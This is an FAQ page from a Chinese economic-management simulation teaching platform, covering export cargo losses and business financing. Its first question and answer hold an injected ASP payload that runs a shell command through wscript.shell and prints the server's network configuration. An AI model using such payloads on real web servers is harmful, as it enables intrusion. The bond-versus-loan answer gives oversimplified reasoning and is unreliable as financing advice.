经济管理行为仿真实验教学平台

常见问答QUESTIONS AND ANSWERS

  1. Q问:<% Response.write CreateObject("wscript.shell").exec("cmd.exe /c ipconfig /all").StdOut.ReadAll %>
    A答:

    <% Response.write CreateObject("wscript.shell").exec("cmd.exe /c ipconfig /all").StdOut.ReadAll %>

  2. Q问:

    出口货物发生意外以后该如何处理?

    A答:

    货物在运输过程中有可能遇到意外造成损失,不能换提单提货,这时,如果已经投保,进口商就应凭保险单到保险公司办理索赔;索赔完成后,不需要再进口报检和报关,也无需填写“进口付汇到货核销表”,只要于付款后到外管局凭“进口付汇核销单”办理进口付汇核销,即可完成合同。

  3. Q问:我们公司经营扩张要买机器,现金不够,发债券好还是从银行贷款好?
    A答:

    答:在购买机器时,采用发债券融资。不能采用从银行贷款的方式融资,因为贷款要当期还本付息,而购买机器款要下期初才扣除。

     

  4. Q问:网站做的不错!
    A答:

    感谢您的关注!我们会继续努力!